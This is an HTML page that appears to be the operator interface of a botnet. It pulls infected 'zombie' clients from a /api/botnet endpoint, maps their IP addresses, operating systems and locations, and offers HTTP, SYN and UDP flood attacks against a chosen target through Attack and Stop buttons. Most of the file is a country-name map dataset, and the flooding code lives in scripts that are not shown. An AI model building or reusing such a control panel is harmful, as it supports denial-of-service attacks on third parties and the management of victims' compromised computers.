<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <title id="title"></title>
  <link href="./css/index.css" rel="stylesheet">
  <link href="./css/terminal.css" rel="stylesheet">
  <script src="./js/config.js"></script>
</head>

<body>
  <center class="text" style="cursor: default;">
    <div class="info">
      <a id="info">
        Windows: 0, Linux: 0, Java: 0, Darwin: 0
      </a>
    </div>
  </center>
  <center>
    <div class="map" id="display-map" style="display: none;">
      <div id="map"></div>
    </div>
  </center>
  <center class="text" style="cursor: default;">
    <div class="attack-div">
      <div class="attack-container">
        <div class="container" id="container">
          <strong class="text">Choose Your attack method (just one)</strong><br>
          <input type="checkbox" id="httpflood" value="httpFlood" class="text"> httpFlood<br>
          <input type="checkbox" id="synflood" value="synFlood" class="text"> synFlood<br>
          <input type="checkbox" id="udpflood" value="udpFlood" class="text"> udpFlood<br>
          <input type="text" placeholder="Target (url for httpFlood)" id="target" class="target">
        </div>
        <div class="btn">
          <a href="#" id="attackbtn" class="attackbtn" class="text">
            Attack
          </a>
        </div>
      </div>
      <div id="terminal" class="terminal" style="display: none;"></div>
      <div class="btn">
        <a href="#" id="stopbtn" class="stopbtn" class="text" style="display: none;">
          Stop
        </a>
      </div>
    </div>
  </center>
  <center class="text" style="cursor: default;">
    <table style="width:1000px" id="table" class="table">
      <tr>
        <th>Ip</th>
        <th>Status</th>
        <th>Country</th>
        <th>Region</th>
        <th>City</th>
        <th>Os</th>
      </tr>
    </table>
  </center>
  <script>
    var simplemaps_worldmap_mapdata = {
      main_settings: {
        //General settings
        width: "1000", //'700' or 'responsive'
        background_color: "#00b6d0",
        background_transparent: "no",
        border_color: "#ffffff",
        popups: "detect",
        state_description: "<ul style=\"width: 80px\"; float: left;><li>Zombies: 0</li><li>Online: 0</li><li>Windows: 0</li><li>Linux: 0</li><li>Java: 0</li><li>Darwin: 0</li>",
        state_color: "#e1ba7d",
        state_hover_color: "#d13c12",
        state_url: "",
        border_size: 1,
        all_states_inactive: "no",
        all_states_zoomable: "",

        //Location defaults
        location_description: "Location description",
        location_color: "#FF0067",
        location_opacity: 0.8,
        location_hover_opacity: 1,
        location_url: "",
        location_size: 25,
        location_type: "square",
        location_image_source: "/images/zombie.png",
        location_border_color: "#FFFFFF",
        location_border: 2,
        location_hover_border: 2.5,
        all_locations_inactive: "no",
        all_locations_hidden: "no",

        //Label defaults
        label_color: "#d5ddec",
        label_hover_color: "#d5ddec",
        label_size: 22,
        label_font: "Arial",
        hide_labels: "no",

        //Zoom settings
        zoom: "no",
        back_image: "no",
        initial_back: "no",
        initial_zoom: -1,
        initial_zoom_solo: "no",
        region_opacity: 1,
        region_hover_opacity: 0.6,
        zoom_out_incrementally: "yes",
        zoom_percentage: 0.99,
        zoom_time: 0.5,

        //Popup settings
        popup_color: "white",
        popup_opacity: 0.9,
        popup_shadow: 1,
        popup_corners: 5,
        popup_font: "12px/1.5 Verdana, Arial, Helvetica, sans-serif",
        popup_nocss: "no",

        //Advanced settings
        div: "map",
        auto_load: "yes",
        url_new_tab: "yes",
        images_directory: "default",
        fade_time: 0.1,
        link_text: "View Website",
        state_image_url: "",
        state_image_position: "",
        location_image_url: ""
      },
      state_specific: {
        AF: {
          name: "Afghanistan"
        },
        AO: {
          name: "Angola"
        },
        AL: {
          name: "Albania"
        },
        AE: {
          name: "United Arab Emirates"
        },
        AR: {
          name: "Argentina"
        },
        AM: {
          name: "Armenia"
        },
        AU: {
          name: "Australia"
        },
        AT: {
          name: "Austria"
        },
        AZ: {
          name: "Azerbaijan"
        },
        BI: {
          name: "Burundi"
        },
        BE: {
          name: "Belgium"
        },
        BJ: {
          name: "Benin"
        },
        BF: {
          name: "Burkina Faso"
        },
        BD: {
          name: "Bangladesh"
        },
        BG: {
          name: "Bulgaria"
        },
        BH: {
          name: "Bahrain"
        },
        BA: {
          name: "Bosnia and Herzegovina"
        },
        BY: {
          name: "Belarus"
        },
        BZ: {
          name: "Belize"
        },
        BO: {
          name: "Bolivia"
        },
        BR: {
          name: "Brazil"
        },
        BN: {
          name: "Brunei Darussalam"
        },
        BT: {
          name: "Bhutan"
        },
        BW: {
          name: "Botswana"
        },
        CF: {
          name: "Central African Republic"
        },
        CA: {
          name: "Canada"
        },
        CH: {
          name: "Switzerland"
        },
        CL: {
          name: "Chile"
        },
        CN: {
          name: "China"
        },
        CI: {
          name: "Côte d'Ivoire"
        },
        CM: {
          name: "Cameroon"
        },
        CD: {
          name: "Democratic Republic of the Congo"
        },
        CG: {
          name: "Republic of Congo"
        },
        CO: {
          name: "Colombia"
        },
        CR: {
          name: "Costa Rica"
        },
        CU: {
          name: "Cuba"
        },
        CZ: {
          name: "Czech Republic"
        },
        DE: {
          name: "Germany"
        },
        DJ: {
          name: "Djibouti"
        },
        DK: {
          name: "Denmark"
        },
        DO: {
          name: "Dominican Republic"
        },
        DZ: {
          name: "Algeria"
        },
        EC: {
          name: "Ecuador"
        },
        EG: {
          name: "Egypt"
        },
        ER: {
          name: "Eritrea"
        },
        EE: {
          name: "Estonia"
        },
        ET: {
          name: "Ethiopia"
        },
        FI: {
          name: "Finland"
        },
        FJ: {
          name: "Fiji" 
        },
        GA: {
          name: "Gabon"
        },
        GB: {
          name: "United Kingdom"
        },
        GE: {
          name: "Georgia"
        },
        GH: {
          name: "Ghana"
        },
        GN: {
          name: "Guinea"
        },
        GM: {
          name: "The Gambia"
        },
        GW: {
          name: "Guinea-Bissau"
        },
        GQ: {
          name: "Equatorial Guinea"
        },
        GR: {
          name: "Greece"
        },
        GL: {
          name: "Greenland"
        },
        GT: {
          name: "Guatemala"
        },
        GY: {
          name: "Guyana"
        },
        HN: {
          name: "Honduras"
        },
        HR: {
          name: "Croatia"
        },
        HT: {
          name: "Haiti"
        },
        HU: {
          name: "Hungary"
        },
        ID: {
          name: "Indonesia"
        },
        IN: {
          name: "India"
        },
        IE: {
          name: "Ireland"
        },
        IR: {
          name: "Iran"
        },
        IQ: {
          name: "Iraq"
        },
        IS: {
          name: "Iceland"
        },
        IL: {
          name: "Israel"
        },
        IT: {
          name: "Italy"
        },
        JM: {
          name: "Jamaica"
        },
        JO: {
          name: "Jordan"
        },
        JP: {
          name: "Japan"
        },
        KZ: {
          name: "Kazakhstan"
        },
        KE: {
          name: "Kenya"
        },
        KG: {
          name: "Kyrgyzstan"
        },
        KH: {
          name: "Cambodia"
        },
        KR: {
          name: "Republic of Korea"
        },
        XK: {
          name: "Kosovo"
        },
        KW: {
          name: "Kuwait"
        },
        LA: {
          name: "Lao PDR"
        },
        LB: {
          name: "Lebanon"
        },
        LR: {
          name: "Liberia"
        },
        LY: {
          name: "Libya"
        },
        LK: {
          name: "Sri Lanka"
        },
        LS: {
          name: "Lesotho"
        },
        LT: {
          name: "Lithuania"
        },
        LU: {
          name: "Luxembourg"
        },
        LV: {
          name: "Latvia"
        },
        MA: {
          name: "Morocco"
        },
        MD: {
          name: "Moldova"
        },
        MG: {
          name: "Madagascar"
        },
        MX: {
          name: "Mexico"
        },
        MK: {
          name: "Macedonia"
        },
        ML: {
          name: "Mali"
        },
        MM: {
          name: "Myanmar"
        },
        ME: {
          name: "Montenegro"
        },
        MN: {
          name: "Mongolia"
        },
        MZ: {
          name: "Mozambique"
        },
        MR: {
          name: "Mauritania"
        },
        MW: {
          name: "Malawi"
        },
        MY: {
          name: "Malaysia"
        },
        NA: {
          name: "Namibia"
        },
        NE: {
          name: "Niger"
        },
        NG: {
          name: "Nigeria"
        },
        NI: {
          name: "Nicaragua"
        },
        NL: {
          name: "Netherlands"
        },
        NO: {
          name: "Norway"
        },
        NP: {
          name: "Nepal"
        },
        NZ: {
          name: "New Zealand"
        },
        OM: {
          name: "Oman"
        },
        PK: {
          name: "Pakistan"
        },
        PA: {
          name: "Panama"
        },
        PE: {
          name: "Peru"
        },
        PH: {
          name: "Philippines"
        },
        PG: {
          name: "Papua New Guinea"
        },
        PL: {
          name: "Poland"
        },
        KP: {
          name: "Dem. Rep. Korea"
        },
        PT: {
          name: "Portugal"
        },
        PY: {
          name: "Paraguay"
        },
        PS: {
          name: "Palestine"
        },
        QA: {
          name: "Qatar"
        },
        RO: {
          name: "Romania"
        },
        RU: {
          name: "Russia"
        },
        RW: {
          name: "Rwanda"
        },
        EH: {
          name: "Western Sahara"
        },
        SA: {
          name: "Saudi Arabia"
        },
        SD: {
          name: "Sudan"
        },
        SS: {
          name: "South Sudan"
        },
        SN: {
          name: "Senegal"
        },
        SL: {
          name: "Sierra Leone"
        },
        SV: {
          name: "El Salvador"
        },
        RS: {
          name: "Serbia"
        },
        SR: {
          name: "Suriname"
        },
        SK: {
          name: "Slovakia"
        },
        SI: {
          name: "Slovenia"
        },
        SE: {
          name: "Sweden"
        },
        SZ: {
          name: "Swaziland"
        },
        SY: {
          name: "Syria"
        },
        TD: {
          name: "Chad"
        },
        TG: {
          name: "Togo"
        },
        TH: {
          name: "Thailand"
        },
        TJ: {
          name: "Tajikistan"
        },
        TM: {
          name: "Turkmenistan"
        },
        TL: {
          name: "Timor-Leste"
        },
        TN: {
          name: "Tunisia"
        },
        TR: {
          name: "Turkey"
        },
        TW: {
          name: "Taiwan"
        },
        TZ: {
          name: "Tanzania"
        },
        UG: {
          name: "Uganda"
        },
        UA: {
          name: "Ukraine"
        },
        UY: {
          name: "Uruguay"
        },
        US: {
          name: "United States"
        },
        UZ: {
          name: "Uzbekistan"
        },
        VE: {
          name: "Venezuela"
        },
        VN: {
          name: "Vietnam"
        },
        VU: {
          name: "Vanuatu"
        },
        YE: {
          name: "Yemen"
        },
        ZA: {
          name: "South Africa"
        },
        ZM: {
          name: "Zambia"
        },
        ZW: {
          name: "Zimbabwe"
        },
        SO: {
          name: "Somalia"
        },
        GF: {
          name: "France"
        },
        FR: {
          name: "France"
        },
        ES: {
          name: "Spain"
        },
        AW: {
          name: "Aruba"
        },
        AI: {
          name: "Anguilla"
        },
        AD: {
          name: "Andorra"
        },
        AG: {
          name: "Antigua and Barbuda"
        },
        BS: {
          name: "Bahamas"
        },
        BM: {
          name: "Bermuda"
        },
        BB: {
          name: "Barbados"
        },
        KM: {
          name: "Comoros"
        },
        CV: {
          name: "Cape Verde"
        },
        KY: {
          name: "Cayman Islands"
        },
        DM: {
          name: "Dominica"
        },
        FK: {
          name: "Falkland Islands"
        },
        FO: {
          name: "Faeroe Islands"
        },
        GD: {
          name: "Grenada"
        },
        HK: {
          name: "Hong Kong"
        },
        KN: {
          name: "Saint Kitts and Nevis"
        },
        LC: {
          name: "Saint Lucia"
        },
        LI: {
          name: "Liechtenstein"
        },
        MF: {
          name: "Saint Martin (French)"
        },
        MV: {
          name: "Maldives"
        },
        MT: {
          name: "Malta"
        },
        MS: {
          name: "Montserrat"
        },
        MU: {
          name: "Mauritius"
        },
        NC: {
          name: "New Caledonia"
        },
        NR: {
          name: "Nauru"
        },
        PN: {
          name: "Pitcairn Islands"
        },
        PR: {
          name: "Puerto Rico"
        },
        PF: {
          name: "French Polynesia"
        },
        SG: {
          name: "Singapore"
        },
        SB: {
          name: "Solomon Islands"
        },
        ST: {
          name: "São Tomé and Principe"
        },
        SX: {
          name: "Saint Martin (Dutch)"
        },
        SC: {
          name: "Seychelles"
        },
        TC: {
          name: "Turks and Caicos Islands"
        },
        TO: {
          name: "Tonga"
        },
        TT: {
          name: "Trinidad and Tobago"
        },
        VC: {
          name: "Saint Vincent and the Grenadines"
        },
        VG: {
          name: "British Virgin Islands"
        },
        VI: {
          name: "United States Virgin Islands"
        },
        CY: {
          name: "Cyprus"
        },
        RE: {
          name: "Reunion (France)"
        },
        YT: {
          name: "Mayotte (France)"
        },
        MQ: {
          name: "Martinique (France)"
        },
        GP: {
          name: "Guadeloupe (France)"
        },
        CW: {
          name: "Curaco (Netherlands)"
        },
        IC: {
          name: "Canary Islands (Spain)"
        }
      },
      locations: {},
      labels: {},
      regions: {}
    };
    fetch(`${config.baseURL}/api/botnet`, {
      headers: {
        'token': config.token,
        'Content-Type': 'application/json'
      }
    })
      .then(res => res.json())
      .then(data => {
        const clients = data.message.clients;
        let count = 0;
        clients.forEach(client => {
          const x = {
            toString: () => {
              return count.toString()
            }
          };
          console.log(client)
          simplemaps_worldmap_mapdata.state_specific[client.location.country].description = `<ul style=\"width: 80px\"; float: left;><li>Zombies: ${data.message.country[client.location.country].zombies}</li><li>Online: ${data.message.country[client.location.country].online}</li><li>Windows: ${data.message.country[client.location.country].Windows}</li><li>Linux: ${data.message.country[client.location.country].Linux}</li><li>Java: ${data.message.country[client.location.country].Java}</li><li>Darwin: ${data.message.country[client.location.country].Darwin}</li>`
          simplemaps_worldmap_mapdata.locations[x] = {
            lat: client.location.latitude.toString(),
            lng: client.location.longitude.toString(),
            name: client.ip,
            description: `<img style=\"float:left; margin-right: 20px;\" src=\"./media/zombie.png\" width=\"64\" height=\"64\"/><ul style=\"width: 175px\"; float: left;><li style="list-style-type: none; text-align: right">${client.os}</li><li style="list-style-type: none; text-align: right" id="map-client-${client.ip}">${client.online === false ? 'Offline' : 'Online'}</li><li style="list-style-type: none; text-align: right">${client.location.region}</li><li style="list-style-type: none; text-align: right">${client.location.city}</li>`,
            size: "6",
            type: "circle",
            color: "#ff0000",
            opacity: "1"
          }
          count++;
        });
      });
    alert('Map: OK');
  </script>
  <script src="./js/terminal.js"></script>
  <script src="../renderer.js"></script>
  <script src="./js/index.js"></script>
  <script src="./js/attack.js"></script>
  <script src="./js/worldmap.js"></script>
</body>

</html>